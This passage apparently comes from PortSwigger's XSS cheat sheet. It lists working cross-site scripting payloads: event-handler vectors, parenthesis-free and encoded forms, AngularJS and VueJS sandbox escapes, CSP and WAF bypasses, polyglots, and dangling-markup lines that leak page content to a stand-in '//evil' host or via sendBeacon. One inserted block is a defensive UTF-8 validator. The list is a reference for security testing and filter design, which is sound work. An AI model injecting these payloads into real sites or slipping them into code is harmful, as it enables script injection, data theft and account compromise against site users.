ondragenter | Requires a mouse drag | <xss draggable=true ondragenter=alert(1)>test</xss>
ondragleave | Requires a mouse drag | <xss draggable=true ondragleave=alert(1)>test</xss>
ondragover | Triggered when dragging over an element | <div draggable=true contenteditable>drag me</div><xss ondragover=alert(1) contenteditable>drop here</xss>
ondragstart | Requires a mouse drag | <xss draggable=true ondragstart=alert(1)>test</xss>
ondrop | Triggered when dropping a draggable element | <div draggable=true contenteditable>drag me</div><xss ondrop=alert(1) contenteditable>drop here</xss>
onfullscreenchange | Fires when a video changes full screen status | <video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
oninput | Requires a change of value | <input oninput=alert(1) value=xss>
oninvalid | Requires a form submission with an element that does not satisfy its constraints, such as a required attribute | <form><input oninvalid=alert(1) required><input type=submit>
onkeydown | Triggered when a key is pressed | <xss onkeydown=alert(1) contenteditable>test</xss>
onkeypress | Triggered when a key is pressed | <xss onkeypress=alert(1) contenteditable>test</xss>
onkeyup | Triggered when a key is released | <xss onkeyup=alert(1) contenteditable>test</xss>
onmousedown | Triggered when the mouse button is pressed | <xss onmousedown=alert(1)>test</xss>
onmouseenter | Triggered when the mouse is hovered over the element | <xss onmouseenter=alert(1)>test</xss>
onmouseleave | Triggered when the mouse is moved away from the element | <xss onmouseleave=alert(1)>test</xss>
onmousemove | Requires mouse movement | <xss onmousemove=alert(1)>test</xss>
onmouseout | Triggered when the mouse is moved away from the element | <xss onmouseout=alert(1)>test</xss>
onmouseover | Requires a hover over the element | <xss onmouseover=alert(1)>test</xss>
onmouseup | Triggered when the mouse button is released | <xss onmouseup=alert(1)>test</xss>
onmousewheel | Fires when the mouse wheel scrolls | <xss onmousewheel=alert(1)>requires scrolling
onmozfullscreenchange | Fires when a video changes full screen status | <video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
onpagehide | Fires when the page is changed | <body onpagehide=navigator.sendBeacon('https://ssl.portswigger-labs.net/',document.body.innerHTML)>
onpaste | Requires you to paste a piece of text | <a onpaste=alert(1) contenteditable>test</a>
onpause | Requires clicking the element to pause | <audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onpointerdown | Fires on pointer down | <xss onpointerdown=alert(1)>XSS</xss>
onpointerenter | Fires when the pointer enters the element | <xss onpointerenter=alert(1)>XSS</xss>
onpointerleave | Fires when the pointer leaves the element | <xss onpointerleave=alert(1)>XSS</xss>
onpointermove | Fires when the pointer moves | <xss onpointermove=alert(1)>XSS</xss>
onpointerout | Fires when the pointer moves out of the element | <xss onpointerout=alert(1)>XSS</xss>
onpointerover | Fires when the pointer moves over the element | <xss onpointerover=alert(1)>XSS</xss>
onpointerrawupdate | Fires when the pointer changes | <xss onpointerrawupdate=alert(1)>XSS</xss>
onpointerup | Fires on pointer up | <xss onpointerup=alert(1)>XSS</xss>
onreset | Requires a click | <form onreset=alert(1)><input type=reset>
onsearch | Fires when a form is submitted and the input has a type attribute of search | <form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked | Requires clicking the element timeline | <audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking | Requires clicking the element timeline | <audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onselect | Requires you to select text | <input onselect=alert(1) value=XSS autofocus>
onselectionchange | Fires when the text selection on the page changes | <body onselectionchange=alert(1)>select some text
onselectstart | Fires when beginning a text selection | <body onselectstart=alert(1)>select some text
onshow | Fires when a context menu is shown | <div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit | Requires a form submission | <form onsubmit=alert(1)><input type=submit>
ontouchend | Fires when a touch ends (touch screen, mobile devices only) | <body ontouchend=alert(1)>
ontouchmove | Fires when a touch moves (touch screen, mobile devices only) | <body ontouchmove=alert(1)>
ontouchstart | Fires when a touch starts (touch screen, mobile devices only) | <body ontouchstart=alert(1)>
onvolumechange | Requires a volume adjustment | <audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onwheel | Fires when you use the mouse wheel | <body onwheel=alert(1)>
Restricted characters
No parentheses, using exception handling | <script>onerror=alert;throw 1</script>
No parentheses, using exception handling, no semicolons | <script>{onerror=alert}throw 1</script>
No parentheses, using exception handling, no semicolons, using expressions | <script>throw onerror=alert,1</script>
No parentheses, using exception handling and eval | <script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses, using exception handling and eval on Firefox | <script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses, using ES6 hasInstance and instanceof with eval | <script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses, using ES6 hasInstance and instanceof with eval without | <script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses, using location redirect | <script>location='javascript:alert\x281\x29'</script>
No parentheses, using location redirect, no strings | <script>location=name</script>
No parentheses, using template strings | <script>alert`1`</script>
No parentheses, using template strings and location hash | <script>new Function`X${document.location.hash.substr`1`}```</script>
No parentheses or spaces, using template strings and location hash | <script>Function`X${document.location.hash.substr`1`}```</script>
Frameworks
Bootstrap onanimationstart event | <xss class=progress-bar-animated onanimationstart=alert(1)>
Bootstrap ontransitionend event | <xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
Protocols
Iframe src attribute with JavaScript protocol | <iframe src="javascript:alert(1)">
Object data attribute with JavaScript protocol | <object data="javascript:alert(1)">
Embed src attribute with JavaScript protocol | <embed src="javascript:alert(1)">
A standard JavaScript protocol | <a href="javascript:alert(1)">XSS</a>
The protocol is not case sensitive | <a href="JaVaScript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol | <a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a and \x0d are allowed inside the protocol | <a href="javas	cript:alert(1)">XSS</a>
Characters \x09, \x0a and \x0d are allowed after the protocol name, before the colon | <a href="javascript	:alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol | <svg><a xlink:href="javascript:alert(1)"><text x=20 y=20>XSS</text></a>
SVG animate tag using values | <svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to | <svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag | <svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src | <script src=data:text/javascript,alert(1)></script>
SVG script href attribute without closing script tag | <svg><script href=data:text/javascript,alert(1) />
SVG use element (Chrome/Firefox) | <svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with data URL | <script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol, rewriting relative URLs | <base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable | <math><x href="javascript:alert(1)">blah
Button and formaction | <form><button formaction=javascript:alert(1)>XSS
Input and formaction | <form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action | <form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL | <svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values | <svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using srcdoc attribute | <iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities | <iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form | <form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: access key attributes can enable XSS on normally unexploitable elements | <input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements: access key attributes can enable XSS on normally unexploitable elements | <link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the current webpage | <a href=# download="filename.html">Test</a>
Disable referrer using referrerpolicy | <img referrerpolicy="no-referrer" src="//portswigger-labs.net">
Set window.name via parameter on the window.open function | <a href=# onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//','alert(1)')">XSS</a>
Set window.name via name attribute in an <iframe> tag | <iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></iframe>
Set window.name via target attribute in a <base> tag | <base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in base tag</a>
Set window.name via target attribute in an <a> tag | <a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//">XSS via target in a tag</a>
Set window.name via usemap attribute in an <img> tag | <img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name);//"></map>
Set window.name via target attribute in a <form> tag | <form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via formtarget attribute in an <input> tag, type submit | <form><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in an <input> tag, type image | <form><input type=hidden name=x value="';eval(name);//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain | <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
Meta charset attribute UTF-7 | <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 1 | +/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 2 | +/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 3 | +/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 4 | +/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests | <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox | <iframe sandbox src="//portswigger-labs.net"></iframe>
Disable referrer | <meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8 | \xC0\xBCscript>alert(1)</script> \xE0\x80\xBCscript>alert(1)</script> \xF0\x80\x80\xBCscript>alert(1)</script> \xF8\x80\x80\x80\xBCscript>alert(1)</script> \xFC\x80\x80\x80\x80\xBCscript>alert(1)</script>
Unicode escapes | <script>\u0061lert(1)</script>
Unicode escapes, ES6 style | <script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded | <script>\u{0000000061}lert(1)</script>
Hex encoding, JavaScript escapes | <script>eval('\x61lert(1)')</script>
Octal encoding | <script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon | <a href="&#106;avascript:alert(1)">XSS</a> <a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding | <svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1),&quot;"</script></svg>
Decimal encoding with padded zeros | <a href="&#0000106;avascript:alert(1)">XSS</a>
Hex encoding entities | <a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semi-colon, provided the next character is not a-f0-9 | <a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>
Hex encoding with padded zeros | <a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive | <a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities | <a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding | <a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding | <a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
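The overlong UTF-8 entry in this section only works when some component downstream of the filter accepts byte sequences such as C0 BC as "<", which well-formed UTF-8 forbids (a two-byte sequence must encode at least U+0080, a three-byte one at least U+0800, and so on). The following validator is an added example, not part of the PortSwigger cheat sheet: it rejects such bytes at the trust boundary before any string-level filtering happens. The sample byte strings are constructed here from the vectors above.

```javascript
// Added example (not PortSwigger's code): strict UTF-8 validation that refuses
// overlong encodings, so a filter never sees bytes a lenient decoder might
// turn into "<". Assumption: the application handles raw request bytes
// (a Buffer or Uint8Array) before decoding them.

// Read one UTF-8 sequence starting at index i. Returns {len, cp} when the
// sequence is well-formed, or {len, error} describing why it is not.
function readSequence(bytes, i) {
  const b0 = bytes[i];
  if (b0 < 0x80) return { len: 1, cp: b0 };
  let need, cp, min;
  if (b0 >= 0xc2 && b0 <= 0xdf) { need = 1; cp = b0 & 0x1f; min = 0x80; }
  else if (b0 >= 0xe0 && b0 <= 0xef) { need = 2; cp = b0 & 0x0f; min = 0x800; }
  else if (b0 >= 0xf0 && b0 <= 0xf4) { need = 3; cp = b0 & 0x07; min = 0x10000; }
  else if (b0 === 0xc0 || b0 === 0xc1) return { len: 1, error: 'overlong 2-byte lead' };
  // F5-FF covers the obsolete 5- and 6-byte forms (F8 .., FC ..) as well.
  else if (b0 >= 0xf5) return { len: 1, error: 'lead byte outside UTF-8 range' };
  else return { len: 1, error: 'unexpected continuation byte' };
  for (let k = 1; k <= need; k++) {
    const b = bytes[i + k];
    if (b === undefined || (b & 0xc0) !== 0x80) return { len: k, error: 'truncated sequence' };
    cp = (cp << 6) | (b & 0x3f);
  }
  if (cp < min) {
    const hex = cp.toString(16).toUpperCase().padStart(4, '0');
    return { len: need + 1, error: `overlong ${need + 1}-byte encoding of U+${hex}` };
  }
  if (cp >= 0xd800 && cp <= 0xdfff) return { len: need + 1, error: 'encoded surrogate' };
  if (cp > 0x10ffff) return { len: need + 1, error: 'code point above U+10FFFF' };
  return { len: need + 1, cp };
}

// Validate a whole buffer. Returns { ok, text, errors: [{ offset, error }] };
// `text` holds only the well-formed sequences, so callers can log what was seen.
function validateUtf8(bytes) {
  const errors = [];
  let text = '';
  for (let i = 0; i < bytes.length;) {
    const r = readSequence(bytes, i);
    if (r.error) errors.push({ offset: i, error: r.error });
    else text += String.fromCodePoint(r.cp);
    i += r.len;
  }
  return { ok: errors.length === 0, text, errors };
}

// Constructed samples: the page's overlong "<" forms followed by script>alert(1)</script>.
const TAIL = Buffer.from('script>alert(1)</script>', 'latin1');
const SAMPLES = {
  'C0 BC': Buffer.concat([Buffer.from([0xc0, 0xbc]), TAIL]),
  'E0 80 BC': Buffer.concat([Buffer.from([0xe0, 0x80, 0xbc]), TAIL]),
  'F0 80 80 BC': Buffer.concat([Buffer.from([0xf0, 0x80, 0x80, 0xbc]), TAIL]),
  'well-formed': Buffer.from('<b>ok</b> \u00e9', 'utf8'),
};
for (const [label, buf] of Object.entries(SAMPLES)) {
  const r = validateUtf8(buf);
  console.log(label, r.ok ? 'accepted' : `rejected: ${r.errors[0].error} at offset ${r.errors[0].offset}`);
}
```

Node's own `Buffer.toString('utf8')` already replaces these sequences with U+FFFD rather than "<"; the validator matters where input is handed to a component whose decoder is not known to be strict, and rejecting the request outright is simpler to reason about than hoping every consumer decodes the same way.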
Obfuscation
Data protocol inside script src with base64 | <script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64 and HTML entities | <script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
Data protocol inside script src with base64 and URL encoding | <script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
Iframe srcdoc HTML encoded | <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding | <iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding | <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS reflected
Version | Author | Length (vector on the following line)
All versions | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62
<div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39
<x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37
<x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes reflected
Version | Author | Length (vector on the following line)
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33
{{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23
)))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23
)))alert(1)
1.2.27 - 1.2.29 / 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23
)))alert(1)
1.3.0 | Gábor Molnár (Google) | 272
{{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102
{{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79
{{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517
{{c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a;}}
>=1.6.0 | Mario Heiderich (Cure53) | 41
{{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33
{{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length (vector on the following line)
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37
constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118
a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119
toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317
{}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29 / 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20
)))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37
constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
AngularJS CSP bypasses
Version | Author | Length (vector on the following line)
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?
Link href stylesheet
<link rel=stylesheet href="//evil?
Link href icon
<link rel=icon href="//evil?
Meta refresh
<meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute
<img src="//evil?
<image src="//evil?
Video using track element
<video><track default src="//evil?
Video using source element and src attribute
<video><source src="//evil?
Audio using source element and src attribute
<audio><source src="//evil?
Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction
<form><input type=submit value=XSS style="width:100%;height:100%" type=submit formaction="//evil?
Form using action
<button form=x style="width:100%;height:100%"><form id=x action="//evil?
Object data
<object data="//evil?
Iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil/ target='
Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/PortSwiggerRes/)//'>
WAF bypass global objects
XSS into a JavaScript string, string concatenation (window, self, this, top, parent, frames, globalThis)
window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, comment syntax (window, self, this, top, parent, frames, globalThis)
window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, hex escape sequence (window, self, this, top, parent, frames, globalThis)
window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window, self, this, top, parent, frames, globalThis)
window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
